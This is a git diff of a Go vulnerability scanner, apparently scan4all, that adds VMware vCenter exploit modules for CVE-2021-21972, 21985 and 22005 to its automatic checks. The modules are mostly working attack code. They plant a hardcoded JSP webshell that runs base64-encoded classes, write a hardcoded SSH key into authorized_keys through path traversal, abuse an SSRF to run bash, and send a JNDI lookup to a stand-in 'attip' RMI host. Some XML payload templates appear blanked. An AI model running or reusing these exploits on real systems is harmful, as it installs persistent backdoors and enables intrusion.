diff --git a/engine/dispather.go b/engine/dispather.go
index be19886eb..b226bd915 100644
--- a/engine/dispather.go
+++ b/engine/dispather.go
@@ -12,6 +12,7 @@ import (
)
// passive 被动模式
+// https://github.com/projectdiscovery/tlsx
var (
CaseScanFunc = map[int]util.EngineFuncType{
ScanType_SSLInfo: nil, // 01- SSL信息分析,并对域名信息进行收集、进入下一步流程
diff --git a/go.mod b/go.mod
index bed7868bf..c6c8f2276 100644
--- a/go.mod
+++ b/go.mod
@@ -101,7 +101,7 @@ require (
github.com/google/go-github v17.0.0+incompatible
github.com/gorilla/websocket v1.5.0
github.com/gosnmp/gosnmp v1.35.0
- github.com/hktalent/PipelineHttp v0.0.0-20221005112256-2ebdd38b820b
+ github.com/hktalent/PipelineHttp v0.0.0-20221005170636-4c4c7c3108ea
github.com/hktalent/goSqlite_gorm v1.1.1
github.com/hktalent/jarm-go v0.0.0-20220918133110-7801447b6267
github.com/huin/asn1ber v0.0.0-20120622192748-af09f62e6358
diff --git a/go.sum b/go.sum
index 20a37945d..81d8d16f9 100644
--- a/go.sum
+++ b/go.sum
@@ -514,6 +514,10 @@ github.com/hktalent/PipelineHttp v0.0.0-20221004080931-279351b9fb96 h1:8++Z/n334
github.com/hktalent/PipelineHttp v0.0.0-20221004080931-279351b9fb96/go.mod h1:ob6ATP4M9FiqTRzyALSDox3kc6+xnTgzKuIT+rmKyeE=
github.com/hktalent/PipelineHttp v0.0.0-20221005112256-2ebdd38b820b h1:S+mVjk0jfAnzT5ypZ65iQq4jjvStt0ggkfnhHoidliY=
github.com/hktalent/PipelineHttp v0.0.0-20221005112256-2ebdd38b820b/go.mod h1:ncw1+ugTc5GPQLUHHI7uWrgW2KWBppDBWwwjC984QJg=
+github.com/hktalent/PipelineHttp v0.0.0-20221005141854-655e41c6acad h1:NFVuThP+NaYXkd8fRXd3DNt02ZiTr2OdBDIF/M1ZmWE=
+github.com/hktalent/PipelineHttp v0.0.0-20221005141854-655e41c6acad/go.mod h1:ncw1+ugTc5GPQLUHHI7uWrgW2KWBppDBWwwjC984QJg=
+github.com/hktalent/PipelineHttp v0.0.0-20221005170636-4c4c7c3108ea h1:riOxhSWDEbwbNFgCxBUkOsTYhZte/I+6Khf9Pab7uxU=
+github.com/hktalent/PipelineHttp v0.0.0-20221005170636-4c4c7c3108ea/go.mod h1:ncw1+ugTc5GPQLUHHI7uWrgW2KWBppDBWwwjC984QJg=
github.com/hktalent/go-utils v0.0.0-20221004021941-7e10e0fb13ea h1:vuxZbB9vAwBi0Uj4F5GOfVtsi5E9MFX07EkCKypVu9M=
github.com/hktalent/go-utils v0.0.0-20221004021941-7e10e0fb13ea/go.mod h1:9E0C0K+/zzyJ+VqFx1llC3y7+mGgW3toLoyMQnlNXhw=
github.com/hktalent/go-utils v0.0.0-20221004095234-2e23f13b429d h1:z1IUP4hqn0LGgs78bU2gSlna92/p+RlB0MSZ+RxSmCo=
diff --git a/lib/util/strTools.go b/lib/util/strTools.go
new file mode 100644
index 000000000..f91e55e21
--- /dev/null
+++ b/lib/util/strTools.go
@@ -0,0 +1,47 @@
+package util
+
+import (
+ "encoding/base64"
+ "math/rand"
+ "net/url"
+ "strings"
+ "time"
+)
+
+var (
+ WebShellName = "x3.jsp"
+ X3Webshell = `<%@page import="javax.xml.bind.*,java.lang.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte[] b){return super.defineClass(b, 0, b.length);}}%><% String c = (String)request.getParameter("c");if(null==c&&null!=session)c=(String)session.getAttribute("c");if (null == c && null != application.getAttribute("_c_"))c=(String)application.getAttribute("_c_");if (null != c)try {application.setAttribute("_c_",c);new U(this.getClass().getClassLoader()).g(DatatypeConverter.parseBase64Binary(c)).newInstance().equals(pageContext);} catch (Exception e) {}%>`
+ Authorized_keys = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsK7OsENqLwuH6pTrCBiNWNI0ByZZURaV+TS6l2P6cxWZpRAgVruyDk+XQ5pY9xJHTZfF75IT+ekWXA5hBe2eO8j+fAQuKaHgvlV8fTp48wMS0LRilfrslOsyv8DsrDs2ZSaiaraj7BwEBalaumczqBM0UoelCa7OvWJDqfyYK8ihQBYBXui/jvyb3FdRA9muOLFuo+AmhIyL3UMQ1jhUxrpmhAKxs6oUjMFXBj//TpvYL7AZXz+2MfmApHYSBx7vs+NodAOf9WShSPoHkuzz3riIsN3hBx66gGRGOPL00lvPsu/GS31klFKaGm3qFcHvO3uczRsaUGj89d/jUwBNh root@linuxkit-025000000001`
+)
+
+func To_b64(file_byte []byte) string {
+ return base64.StdEncoding.EncodeToString(file_byte)
+}
+
+func GetUrlHost(szUrl string) string {
+ if oU, err := url.Parse(szUrl); nil == err {
+ szUrl = oU.Scheme + "://" + oU.Host
+ }
+ return szUrl
+}
+
+// 生成随机id
+func GeneratorId(add_time int64) string {
+ var list_str = []string{}
+ size := 6
+ chars := "abcdefghijklmnopqrstuvwxyz"
+ dights := "0123456789"
+ strs := chars + dights
+ zz := time.Now().Unix() + add_time
+ rand.Seed(zz)
+
+ a := int64(len(strs))
+ for i := 0; i < size; i++ {
+ flag := rand.Int63n(a)
+ _ = flag
+ list_str = append(list_str, string(strs[int(flag)]))
+ }
+ // res := strings.Join(s, "")
+ res := strings.Join(list_str, "")
+ return res
+}
diff --git a/lib/util/sv2es.go b/lib/util/sv2es.go
index 7607082de..fcb969795 100644
--- a/lib/util/sv2es.go
+++ b/lib/util/sv2es.go
@@ -1,12 +1,10 @@
package util
import (
- "bytes"
"crypto/sha1"
"encoding/hex"
"encoding/json"
"fmt"
- "github.com/hktalent/PipelineHttp"
"io/ioutil"
"log"
"net/http"
@@ -77,8 +75,6 @@ func SendAData[T any](k string, data []T, szType ESaveType) {
}
}
-var pphLog = PipelineHttp.NewPipelineHttp()
-
// 发送数据到ES
func SendReq(data1 interface{}, id string, szType ESaveType) {
DoSyncFunc(func() {
@@ -86,14 +82,17 @@ func SendReq(data1 interface{}, id string, szType ESaveType) {
return
}
//log.Println("enableEsSv = ", enableEsSv, " id= ", id, " type = ", szType)
- data, _ := json.Marshal(data1)
nThreads <- struct{}{}
defer func() {
<-nThreads
}()
szUrl := fmt.Sprintf(EsUrl, szType, url.QueryEscape(id))
log.Println("logs EsUrl = ", EsUrl)
- pphLog.DoGetWithClient4SetHd(nil, szUrl, "POST", bytes.NewReader(data), func(resp *http.Response, err error, szU string) {
+ m1 := map[string]string{
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15",
+ "Content-Type": "application/json;charset=UTF-8",
+ }
+ SendData2Url(szUrl, data1, &m1, func(resp *http.Response, err error, szU string) {
if nil != err {
log.Println("pphLog.DoGetWithClient4SetHd ", err)
} else {
@@ -104,12 +103,6 @@ func SendReq(data1 interface{}, id string, szType ESaveType) {
Log(err)
}
}
- }, func() map[string]string {
- m1 := map[string]string{
- "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15",
- "Content-Type": "application/json;charset=UTF-8",
- }
- return m1
- }, true)
+ })
})
}
diff --git a/lib/util/sv2es_test.go b/lib/util/sv2es_test.go
index 45207ea38..bf3dc9004 100644
--- a/lib/util/sv2es_test.go
+++ b/lib/util/sv2es_test.go
@@ -7,7 +7,7 @@ import (
func TestSendReq(t *testing.T) {
DoInit(nil)
t.Run("sv2es", func(t *testing.T) {
- SendReq("test", "nmap", Nmap)
+ SendReq(`{"xx":"sdfsf"}`, "xx01nmap", Nmap)
})
Wg.Wait()
CloseAll()
diff --git a/lib/util/util.go b/lib/util/util.go
index 3422e3ba0..1f0df357b 100644
--- a/lib/util/util.go
+++ b/lib/util/util.go
@@ -2,7 +2,9 @@ package util
import (
"bufio"
+ "bytes"
"encoding/base64"
+ "encoding/json"
"errors"
"fmt"
"github.com/codegangsta/inject"
@@ -97,6 +99,7 @@ func GetClient(szUrl string) *PipelineHttp.PipelineHttp {
client = PipelineHttp.NewPipelineHttp()
mUrls[oU.Host] = ""
+ clientHttpCc.Delete(oU.Host)
clientHttpCc.Set(oU.Host, client, defaultInteractionDuration)
return client
}
@@ -382,3 +385,13 @@ func ScannerToReader(scanner *bufio.Scanner) io.Reader {
return reader
}
+
+// 纯粹发送数据到目标机器
+func SendData2Url(szUrl string, data1 interface{}, m1 *map[string]string, fnCbk func(resp *http.Response, err error, szU string)) {
+ data, _ := json.Marshal(data1)
+ log.Println("logs EsUrl = ", EsUrl)
+ c1 := GetClient(szUrl)
+ c1.DoGetWithClient4SetHd(c1.Client, szUrl, "POST", bytes.NewReader(data), fnCbk, func() map[string]string {
+ return *m1
+ }, true)
+}
diff --git a/pocs_go/VMware/vCenter/CVE_2021_21985.go b/pocs_go/VMware/vCenter/CVE_2021_21985.go
new file mode 100644
index 000000000..85ce97073
--- /dev/null
+++ b/pocs_go/VMware/vCenter/CVE_2021_21985.go
@@ -0,0 +1,39 @@
+package vCenter
+
+import (
+ "fmt"
+ "github.com/hktalent/scan4all/lib/util"
+ "io"
+ "net/http"
+ "net/url"
+)
+
+/*
+https://github.com/welk1n/JNDI-Injection-Bypass/
+*/
+func Check_CVE_2021_21985(szUrl string) bool {
+ szPayload := "rmi://attip:1097/ExecByEL"
+ aP := []string{
+ `{"methodInput":[null]}`,
+ `{"methodInput":["javax.naming.InitialContext.doLookup"]}`,
+ `{"methodInput":["doLookup"]}`,
+ fmt.Sprintf(`methodInput":[["%s"]]}`, szPayload),
+ `{"methodInput":[]}`,
+ `{"methodInput":[]}`,
+ }
+ if oU, err := url.Parse(szUrl); nil == err {
+ s1 := oU.Scheme + "://" + oU.Hostname() + "/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService"
+ uris := []string{"/setTargetObject", "/setStaticMethod", "/setTargetMethod", "/setArguments", "/prepare", "/invoke"}
+ headers := map[string]string{"Content-Type": "application/json"}
+ for i, x := range uris {
+ util.SendData2Url(s1+x, aP[i], &headers, func(resp *http.Response, err error, szU string) {
+ if nil != resp {
+ io.Copy(io.Discard, resp.Body)
+ }
+ })
+ }
+ // 延时几秒 检测 rmi 回显示,如果目标不能出网,可以尝试打 SSRF
+
+ }
+ return false
+}
diff --git a/pocs_go/VMware/vCenter/c_21972.go b/pocs_go/VMware/vCenter/c_21972.go
new file mode 100644
index 000000000..713e04700
--- /dev/null
+++ b/pocs_go/VMware/vCenter/c_21972.go
@@ -0,0 +1,188 @@
+package vCenter
+
+import (
+ "archive/tar"
+ "bytes"
+ "fmt"
+ "github.com/hktalent/PipelineHttp"
+ "github.com/hktalent/scan4all/lib/util"
+ "io"
+ "log"
+ "net/http"
+ "os/exec"
+ "strconv"
+ "strings"
+)
+
+func Generate_tar(name string, o_name string, step string) bytes.Buffer {
+ // 创建一个缓冲区用来保存压缩文件内容
+ var buf bytes.Buffer
+ // 创建一个压缩文档
+ tw := tar.NewWriter(&buf)
+ // 定义一堆文件
+ // 将文件写入到压缩文档tw
+ tar_file_name := ""
+ // filename := ""
+ if o_name == "windows" {
+ tar_file_name = "../../../../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/" + util.WebShellName
+ // filename = "win.tar"
+
+ } else if o_name == "ssh" {
+ tar_file_name = "../../../../../home/vsphere-ui/.ssh/authorized_keys"
+ // filename = "cron.tar"
+ } else {
+ tar_file_name = strings.Replace("../../../../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/qq/0/h5ngc.war/resources/", "qq", step, 1) + util.WebShellName
+ // filename = "linux.tar"
+ }
+ var files = []struct {
+ Name, Body string
+ }{
+ {tar_file_name, string(name)},
+ }
+ //fmt.Println(tar_file_name)
+ for _, file := range files {
+ hdr := &tar.Header{
+ Name: file.Name,
+ Mode: 0600,
+ Size: int64(len(file.Body)),
+ }
+ if err := tw.WriteHeader(hdr); err != nil {
+ log.Println(err)
+ return buf
+ }
+ if _, err := tw.Write([]byte(file.Body)); err != nil {
+ log.Println(err)
+ return buf
+ }
+ }
+ if err := tw.Close(); err != nil {
+ log.Println(err)
+ return buf
+ }
+
+ // // 将压缩文档内容写入文件 file.tar.gz
+ // f, err := os.OpenFile(filename, os.O_CREATE|os.O_WRONLY, 0666)
+ // if err != nil {
+ // log.Fatal(err)
+ // }
+ // buf.WriteString("qq")
+ // ss := buf.String()
+ // q, err := os.OpenFile("new"+filename, os.O_CREATE|os.O_WRONLY, 0666)
+ // if err != nil {
+ // log.Fatal(err)
+ // }
+ // q.WriteString(ss)
+ // a := io.ByteReader(buf)
+ // buf.WriteTo(f)
+ // fmt.Println(buf.Bytes())
+ return buf
+
+}
+
+func Upload_shell2(szUrl string, buf bytes.Buffer) (string, bool) {
+ szUrl = util.GetUrlHost(szUrl)
+ szRst := ""
+ szUrl = szUrl + "/ui/vropspluginui/rest/services/uploadova"
+ c1 := util.GetClient(szUrl)
+ c1.SendFiles(c1.Client, szUrl, nil, &[]PipelineHttp.PostFileData{PipelineHttp.PostFileData{
+ ContentType: "application/json;charset=UTF-8",
+ Name: "uploadFile",
+ FileName: util.GeneratorId(5) + ".tar",
+ FileData: bytes.NewReader(buf.Bytes()),
+ }}, func(resp *http.Response, err error, szU string) {
+ if nil != resp {
+ if data, err := io.ReadAll(resp.Body); nil != err {
+ if strings.Contains(string(data), "SUCCESS") {
+ szRst = szU
+ }
+ }
+ if resp.StatusCode == 200 {
+ fmt.Println("[+] 上传成功,开始命令执行.")
+ }
+ }
+ }, func() map[string]string {
+ m1 := map[string]string{
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15",
+ }
+ return m1
+ })
+ return szRst, "" != szRst
+}
+
+func Upload_windows_shell(szUrl, tar_content string) string {
+ buffer := Generate_tar(tar_content, "windows", "?")
+ if szRst, ok := Upload_shell2(szUrl, buffer); ok {
+ log.Println("start test ", szRst)
+ return Check_shell(szUrl, "windows")
+ }
+ return ""
+}
+
+func Upload_linux_shell(url, tar_content string) string {
+ for i := 1; i <= 121; i++ {
+ buffer := Generate_tar(tar_content, "linux", strconv.Itoa(i))
+ if szRst, ok := Upload_shell2(url, buffer); ok {
+ log.Println("start test ", szRst)
+ return Check_shell(url, "linux")
+ break
+ }
+ }
+ return ""
+}
+
+func Upload_ssh_authorized_keys(szUrl, tar_content string) string {
+ buffer := Generate_tar(tar_content, "ssh", "?")
+ s1 := util.GetUrlHost(szUrl)
+ if szRst, ok := Upload_shell2(szUrl, buffer); ok {
+ log.Println("start test ", szRst)
+ szCmd := "vsphere-ui@" + strings.Split(s1, ":")[0]
+ cmd := exec.Command("ssh", szCmd, "whoami")
+ if output, err := cmd.Output(); nil == err {
+ res := strings.Replace((string(output)), "\n", "", 1)
+ if res == "vsphere-ui" {
+ s1 = "上传成功: ssh " + szCmd
+ log.Println(s1)
+ return s1
+ }
+ }
+ }
+ return ""
+}
+
+func Check_shell(szUrl string, os_name string) string {
+ szUrl = util.GetUrlHost(szUrl)
+ shell_url := ""
+ if os_name == "windows" {
+ shell_url = szUrl + "/statsreport/" + util.WebShellName
+ } else if os_name == "linux" {
+ shell_url = szUrl + "/ui/resources/" + util.WebShellName
+ }
+ if "" == shell_url {
+ return ""
+ }
+ util.SendData2Url(shell_url, "", &map[string]string{
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15",
+ }, func(resp *http.Response, err error, szU string) {
+ if nil != resp {
+ if resp.StatusCode == 200 {
+ shell_url = szU
+ fmt.Println("[+] 上传成功,开始命令执行.")
+ }
+ io.Copy(io.Discard, resp.Body)
+ } else {
+ shell_url = ""
+ }
+ })
+ return shell_url
+}
+
+func CheckVul003(szUrl string) (string, bool) {
+ var szRst string
+ if szRst = Upload_windows_shell(szUrl, util.X3Webshell); "" != szRst {
+ return szRst, "" != szRst
+ } else if szRst = Upload_linux_shell(szUrl, util.X3Webshell); "" != szRst {
+ return szRst, "" != szRst
+ }
+ szRst = Upload_ssh_authorized_keys(szUrl, util.Authorized_keys)
+ return szRst, "" != szRst
+}
diff --git a/pocs_go/VMware/vCenter/c_21985.go b/pocs_go/VMware/vCenter/c_21985.go
new file mode 100644
index 000000000..b7362cdc6
--- /dev/null
+++ b/pocs_go/VMware/vCenter/c_21985.go
@@ -0,0 +1,112 @@
+package vCenter
+
+import (
+ "archive/zip"
+ "bytes"
+ "fmt"
+ "github.com/hktalent/scan4all/lib/util"
+ "io"
+ "log"
+ "net/http"
+ "strings"
+ "time"
+)
+
+func Upload(szUrl, b64_str string) {
+ szUrl = util.GetUrlHost(szUrl)
+ ssrf_url := strings.Replace("https://localhost:443/vsanHealth/vum/driverOfflineBundle/data:text/html%3Bbase64,qq%23", "qq", b64_str, -1)
+ tarGet := szUrl + "/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages"
+ jsonText := fmt.Sprintf("{\"methodInput\":[[\"%s\"]]}", ssrf_url)
+ util.SendData2Url(tarGet, jsonText, &map[string]string{
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15",
+ "Content-Type": "application/json;charset=UTF-8",
+ }, func(resp *http.Response, err error, szU string) {
+ if nil != resp {
+ io.Copy(io.Discard, resp.Body)
+ if resp.StatusCode == 200 {
+ fmt.Println("[+] 上传成功,开始命令执行.")
+ }
+ }
+ })
+}
+func Execute(szUrl string) string {
+ szUrl = util.GetUrlHost(szUrl)
+ tarGet := szUrl + "/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty"
+ jsonText := "{\"methodInput\":" + " [" + "\"output\", null" + "]}"
+ szRst := ""
+ util.SendData2Url(tarGet, jsonText, &map[string]string{
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15",
+ "Content-Type": "application/json;charset=UTF-8",
+ }, func(resp *http.Response, err error, szU string) {
+ if nil != resp {
+ if data, err := io.ReadAll(resp.Body); nil != err {
+ s1 := strings.Replace(string(data), "\\n", "\n", -1)
+ if strings.Contains(s1, "uid=") && strings.Contains(s1, "gid=") {
+ szRst = szU
+ }
+ log.Println(s1)
+ }
+ }
+ })
+ return szRst
+}
+
+func Generate_xml(command string) []byte {
+ con := `
+
+
+
+ /bin/bash
+ -c
+ &1 ]]>
+
+
+
+
+
+ #{pb.start().getInputStream()}
+
+
+
+
+ #{is}
+
+
+
+
+
+
+`
+ xml_str := strings.Replace(con, "{cmd}", command, -1)
+ //// fmt.Println(xml_str)
+ //ioutil.WriteFile("offline_bundle.xml", []byte(xml_str), 0666)
+
+ return []byte(xml_str)
+}
+
+func Zip_file(src string, xml_buf []byte) []byte {
+ var buf bytes.Buffer
+ zipWriter := zip.NewWriter(&buf) //初始化一个zip.Writer,用来将数据写入zip文件中
+ w2, err := zipWriter.Create(src) //创建一个io.Writer
+ if err != nil {
+ log.Println(err)
+ return nil
+ }
+
+ w2.Write(xml_buf)
+ zipWriter.Close()
+ return buf.Bytes()
+}
+
+func CheckVul002(szUrl string) (string, bool) {
+ t1 := Generate_xml(`id`)
+ t2 := Zip_file("offline_bundle.xml", t1)
+ t3 := util.To_b64(t2)
+ Upload(szUrl, t3)
+ time.Sleep(1)
+ szRst := Execute(szUrl)
+ return szRst, "" != szRst
+}
diff --git a/pocs_go/VMware/vCenter/c_22005.go b/pocs_go/VMware/vCenter/c_22005.go
new file mode 100644
index 000000000..d63a3809f
--- /dev/null
+++ b/pocs_go/VMware/vCenter/c_22005.go
@@ -0,0 +1,151 @@
+package vCenter
+
+import (
+ "fmt"
+ "github.com/hktalent/scan4all/lib/util"
+ "io"
+ "net/http"
+ "strings"
+)
+
+func Create_agent(szUrl, log_param, agent_name string) {
+ szUrl = util.GetUrlHost(szUrl)
+ target := fmt.Sprintf("%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s", szUrl, agent_name, log_param)
+ body := `{"manifestSpec":{},
+ "objectType": "a2",
+ "collectionTriggerDataNeeded": true,
+ "deploymentDataNeeded":true,
+ "resultNeeded": true,
+ "signalCollectionCompleted":true,
+ "localManifestPath": "a7",
+ "localPayloadPath": "a8",
+ "localObfuscationMapPath": "a9"}`
+ myheader := map[string]string{"Cache-Control": "max-age=0",
+ "Upgrade-Insecure-Requests": "1",
+ "User-Agent": "Mozilla/5.0",
+ "X-Deployment-Secret": "abc",
+ "Content-Type": "application/json",
+ "Connection": "close"}
+ util.SendData2Url(target, body, &myheader, func(resp *http.Response, err error, szU string) {
+ if nil != resp {
+ io.Copy(io.Discard, resp.Body)
+ }
+ })
+}
+func str_to_escape(str string) string {
+ // byte_str := []byte(str)
+ res := ""
+ for _, value := range str {
+ // fmt.Print(value)
+ // a, err := strconv.Atoi(string(value))
+ // _ = err
+ s := fmt.Sprintf("\\\\u%04x", string(value))
+ // fmt.Println(s)
+ res += s
+ }
+ return res
+}
+
+func get_data(str string) string {
+ a := strings.Replace(str, "\n", "\\n", -1)
+ a = strings.Replace(a, "\t", " ", -1)
+ a = strings.Replace(a, "\"", "\\\"", -1)
+ return a
+
+}
+func generate_manifest(webshell_location, webshell string) string {
+ ss := `
+
+
+
+ ServiceInstance
+
+
+ content.about.instanceUuid
+ content.about.osType
+ content.about.build
+ content.about.version
+
+
+
+
+
+
+
+ vir:VCenter
+
+
+
+ ServiceInstance
+
+
+
+
+
+
+
+
+
+
+
+
+ vir:VCenter
+
+
+
+ `
+ a := fmt.Sprintf(ss, webshell_location, webshell)
+ return a
+}
+
+func Upload_shell(szUrl, log_param, agent_name, wb_str string) string {
+ szUrl = util.GetUrlHost(szUrl)
+ tarGet := fmt.Sprintf("%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s", szUrl, agent_name, log_param)
+ webshell := util.X3Webshell
+ if len(wb_str) > 1 {
+ webshell = wb_str
+ }
+ webshell_str := str_to_escape(webshell)
+ manifest_data := get_data(generate_manifest("/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/"+util.WebShellName, webshell_str))
+ myheader := map[string]string{"Cache-Control": "max-age=0",
+ "Upgrade-Insecure-Requests": "1",
+ "User-Agent": "Mozilla/5.0",
+ "X-Deployment-Secret": "abc",
+ "Content-Type": "application/json",
+ "Connection": "close"}
+ data := fmt.Sprintf("{\"contextData\": \"a3\",\"%s\":\"%s\",\"objectId\": \"a2\"}", "manifestContent", manifest_data)
+ // fmt.Println(jsonText)
+ szRst := ""
+ util.SendData2Url(tarGet, data, &myheader, func(resp *http.Response, err error, szU string) {
+ if nil != resp && (resp.StatusCode == 201 || resp.StatusCode == 200) {
+ io.Copy(io.Discard, resp.Body)
+ // check shell
+ util.SendData2Url(szUrl+"/idm/..;/"+util.WebShellName, "", &myheader, func(resp *http.Response, err error, szU string) {
+ if nil != resp {
+ io.Copy(io.Discard, resp.Body)
+ if resp.StatusCode == 200 {
+ szRst = szU
+ fmt.Println("[+] 上传成功,检查Webshell: " + szU)
+ }
+ }
+ })
+ }
+ })
+ return szRst
+}
+
+func CheckVul001(szUrl string) (string, bool) {
+ log_param := util.GeneratorId(2)
+ agent_name := util.GeneratorId(5)
+ Create_agent(szUrl, log_param, agent_name)
+ szRst := Upload_shell(szUrl, log_param, agent_name, "")
+ return szRst, "" != szRst
+}
diff --git a/pocs_go/go_poc_check.go b/pocs_go/go_poc_check.go
index 012bc3d94..6f0c79337 100644
--- a/pocs_go/go_poc_check.go
+++ b/pocs_go/go_poc_check.go
@@ -9,6 +9,7 @@ import (
"github.com/hktalent/scan4all/lib/util"
"github.com/hktalent/scan4all/pocs_go/Springboot"
"github.com/hktalent/scan4all/pocs_go/ThinkPHP"
+ "github.com/hktalent/scan4all/pocs_go/VMware/vCenter"
"github.com/hktalent/scan4all/pocs_go/apache"
"github.com/hktalent/scan4all/pocs_go/confluence"
"github.com/hktalent/scan4all/pocs_go/f5"
@@ -89,6 +90,19 @@ func POCcheck(wappalyzertechnologies []string, URL string, finalURL string, chec
if nil != err && 0 < len(a) {
technologies = append(technologies, fmt.Sprintf("microsoft port 135 Dcom Oxid:%s", hostname))
}
+ case "vmware-vcenter":
+ if vCenter.Check_CVE_2021_21985(finalURL) {
+ technologies = append(technologies, fmt.Sprintf("CVE-2021-21985 RCE:%s", hostname))
+ }
+ if s, ok := vCenter.CheckVul001(finalURL); ok {
+ technologies = append(technologies, fmt.Sprintf("found vmware RCE,shell:%s", s))
+ }
+ if s, ok := vCenter.CheckVul002(finalURL); ok {
+ technologies = append(technologies, fmt.Sprintf("found vmware RCE,shell:%s", s))
+ }
+ if s, ok := vCenter.CheckVul003(finalURL); ok {
+ technologies = append(technologies, fmt.Sprintf("found vmware RCE,shell:%s", s))
+ }
case "microsoft-ds":
key, err := ms.SmbGhostScan(hostname)
if nil == err && key {
diff --git a/vendor/github.com/hktalent/PipelineHttp/DoFile.go b/vendor/github.com/hktalent/PipelineHttp/DoFile.go
new file mode 100644
index 000000000..7d1d59f4a
--- /dev/null
+++ b/vendor/github.com/hktalent/PipelineHttp/DoFile.go
@@ -0,0 +1,76 @@
+package PipelineHttp
+
+import (
+ "bytes"
+ "encoding/json"
+ "fmt"
+ "io"
+ "log"
+ "mime/multipart"
+ "net/http"
+ "net/textproto"
+)
+
+// post 发送的多文件
+type PostFileData struct {
+ ContentType string `json:"content_type"`
+ Name string `json:"name"`
+ FileName string `json:"file_name"`
+ FileData io.Reader `json:"file_data"`
+}
+
+// 增加、支持:多文件上传
+func (r *PipelineHttp) SendFiles(c *http.Client, szUrl string, parms *map[string]interface{}, files *[]PostFileData, fnCbk func(resp *http.Response, err error, szU string), setHeader func() map[string]string) {
+ body_buf := bytes.NewBufferString("")
+ // reader, writer := io.Pipe()// 这里不适合这样的场景,无法提前预知发送数据的总长度
+ // head start
+ body_writer := multipart.NewWriter(body_buf)
+ // head end
+ var err error
+ var f01 io.Writer
+ if nil != parms {
+ var data []byte
+ for k, v := range *parms {
+ if f01, err = body_writer.CreateFormField(k); nil == err {
+ if data, err = json.Marshal(v); nil == err {
+ f01.Write(data)
+ continue
+ }
+ }
+ if nil != err {
+ log.Println(err)
+ }
+ }
+ }
+ if nil != files {
+ for _, x := range *files {
+ mh := textproto.MIMEHeader{} // make(textproto.MIMEHeader)
+ szC := x.ContentType
+ if "" == szC {
+ szC = "text/plain; charset=UTF-8"
+ }
+ mh.Set("Content-Type", szC)
+ mh.Set("Content-Disposition", fmt.Sprintf("form-data; name=\"%s\"; filename=\"%s\"", x.Name, x.FileName))
+ f01, err = body_writer.CreatePart(mh)
+ if nil == err {
+ io.Copy(f01, x.FileData)
+ continue
+ }
+ if nil != err {
+ log.Println(err)
+ }
+ }
+ }
+ body_writer.Close()
+ bbData := body_buf.Bytes()
+ r.DoGetWithClient4SetHd(c, szUrl, "POST", bytes.NewReader(bbData), fnCbk, func() map[string]string {
+ m10 := setHeader()
+ if nil == m10 {
+ m10 = make(map[string]string)
+ }
+ m10["Content-Type"] = fmt.Sprintf("multipart/related; boundary=%s", body_writer.Boundary())
+ m10["Content-Length"] = fmt.Sprintf("%d", len(bbData))
+ //m10["Authorization"] = fmt.Sprintf("Bearer %s", accessToken)
+ return m10
+ }, true)
+}
diff --git a/vendor/github.com/hktalent/PipelineHttp/PipelineHttp.go b/vendor/github.com/hktalent/PipelineHttp/PipelineHttp.go
index 72d940697..fdaa1accd 100644
--- a/vendor/github.com/hktalent/PipelineHttp/PipelineHttp.go
+++ b/vendor/github.com/hktalent/PipelineHttp/PipelineHttp.go
@@ -234,6 +234,9 @@ func (r *PipelineHttp) DoGetWithClient4SetHd(client *http.Client, szUrl string,
return
}
if !r.UseHttp2 && nil != resp && resp.StatusCode == http.StatusSwitchingProtocols {
+ if resp != nil {
+ resp.Body.Close() // resp 可能为 nil,不能读取 Body
+ }
r.UseHttp2 = true
r.Client = r.GetRawClient4Http2()
r.DoGetWithClient4SetHd(r.Client, szUrl, method, postBody, fnCbk, setHd, bCloseBody)
diff --git a/vendor/modules.txt b/vendor/modules.txt
index 41a61407d..ab87c2aba 100644
--- a/vendor/modules.txt
+++ b/vendor/modules.txt
@@ -570,7 +570,7 @@ github.com/hashicorp/hcl/json/token
# github.com/hbakhtiyor/strsim v0.0.0-20190107154042-4d2bbb273edf
## explicit
github.com/hbakhtiyor/strsim
-# github.com/hktalent/PipelineHttp v0.0.0-20221005112256-2ebdd38b820b
+# github.com/hktalent/PipelineHttp v0.0.0-20221005170636-4c4c7c3108ea
## explicit; go 1.18
github.com/hktalent/PipelineHttp
# github.com/hktalent/go-utils v0.0.0-20221004095234-2e23f13b429d